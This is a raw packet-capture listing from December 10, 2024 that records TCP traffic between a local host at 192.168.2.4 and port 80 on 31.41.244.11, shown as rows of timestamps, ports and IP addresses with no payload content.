Dec 10, 2024 00:43:11.319360971 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.319406986 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.321857929 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.321906090 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.322004080 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.322046041 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.324351072 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.324398994 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.324484110 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.324532986 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.326901913 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.326948881 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.326982021 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.327033043 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.329355001 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.329404116 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.329478979 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.329524040 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.331789970 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.331841946 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.331892014 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.331939936 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.334184885 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.334239006 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.334321022 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.334361076 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.336610079 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.336653948 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.336719990 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.336766958 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.339030981 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.339080095 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.339169025 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.339214087 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.341428995 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.341476917 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.341492891 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.341540098 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.343848944 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.343894958 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.343957901 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.344002962 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.346249104 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.346308947 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.346339941 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.346380949 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.348675966 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.348726988 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.348871946 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.348927021 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.351094961 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.351145029 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.351172924 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.351217985 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.353499889 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.353549957 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.353593111 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.353641987 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.355946064 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.356000900 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.356024981 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.356072903 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.358398914 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.358448982 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.358496904 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.358536959 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.360837936 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.360882044 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.360969067 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.361027002 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.363205910 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.363274097 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.363329887 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.363380909 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.365592957 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.365648031 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.365768909 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.365814924 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.368042946 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.368083954 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.368251085 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.368298054 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.370484114 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.370528936 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.370623112 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.370668888 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.372852087 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.372900963 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.372989893 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.373034954 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.375277996 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.375323057 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.375411987 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.375461102 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.377655983 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.377713919 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.377727032 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.377774954 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.380103111 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.380156994 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.380254984 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.380302906 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.382523060 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.382572889 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.382576942 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.382616043 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.384919882 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.384969950 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.385011911 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.385060072 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.387355089 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.387403965 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.387439966 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.387485981 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.389770985 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.389821053 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.496016979 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.496079922 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.496176958 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.496222019 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.496990919 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.497039080 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.497379065 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.497423887 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.497539997 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.497585058 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.499418020 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.499464035 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.499499083 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.499547005 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.501425982 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.501471043 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.501535892 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.501581907 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.503412962 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.503472090 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.503590107 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.503637075 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.505433083 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.505482912 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.505518913 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.505563021 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.507340908 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.507389069 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.507447004 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.507493019 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.509237051 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.509284973 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.509373903 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.509421110 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.511115074 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.511162996 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.511235952 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.511281013 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.512974024 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.513022900 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.513053894 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.513089895 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.514779091 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.514827967 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.514911890 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.514955997 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.516614914 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.516664028 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.516714096 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.516760111 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.518450975 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.518501043 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.518565893 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.518611908 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.520246983 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.520293951 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.520322084 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.520369053 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.522052050 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.522099972 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.522217989 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.522260904 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.523878098 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.523924112 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.524003983 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.524070024 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.525715113 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.525760889 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.525788069 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.525827885 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.527523994 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.527582884 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.527669907 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.527714014 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.529350996 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.529408932 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.529524088 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.529568911 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.531193972 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.531239986 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.531308889 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.531361103 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.533035994 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.533086061 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.533152103 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.533200026 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.534846067 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.534894943 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.534945965 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.534986973 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.536685944 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.536734104 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.536751032 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.536791086 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.538451910 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.538497925 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.538554907 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.538738012 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.540292978 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.540345907 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.540411949 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.540457964 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.542196989 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.542243958 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.542323112 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.542368889 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.543922901 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.543991089 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.544018984 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.544059992 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.545737982 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.545785904 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.545814037 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.545856953 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.547576904 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.547625065 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.547684908 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.547730923 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.549395084 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.549444914 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.549490929 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.549539089 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.551204920 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.551250935 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.551338911 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.551384926 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.553047895 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.553095102 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.553128004 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.553188086 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.554869890 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.554918051 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.554959059 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.555008888 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.556684017 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.556731939 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.556804895 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.556852102 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.558520079 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.558566093 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.558654070 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.558701992 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.560376883 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.560425043 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.560507059 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.560550928 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.562149048 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.562197924 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.562228918 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.562278986 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.563952923 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.563997030 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.564066887 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.564126968 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.565787077 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.565835953 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.565898895 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.565947056 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.567635059 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.567684889 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.567711115 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.567759991 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.569608927 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.569654942 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.569797039 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.569843054 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.571327925 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.571374893 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.571400881 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.571444988 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.573107958 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.573158979 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.573203087 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.573245049 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.574914932 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.574959993 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.575042009 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.575094938 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.576733112 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.576786995 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.576817989 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.576867104 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.578567028 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.578618050 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.578668118 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.578710079 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.580378056 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.580431938 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.580465078 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.580507994 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.582220078 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.582271099 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.582303047 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.582350969 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.584033012 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.584089041 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.584108114 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.584153891 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.585861921 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.585911036 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.586013079 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.586057901 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.587667942 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.587726116 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.587758064 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.587805033 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.589512110 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.589564085 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.589596033 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.589648962 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.591286898 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.591331959 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.688272953 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.688347101 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.688441038 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.688487053 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.688927889 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.688973904 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.689116955 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.689166069 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.690603018 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.690622091 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.690650940 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.690668106 CET	49790	80	192.168.2.4	31.41.244.11
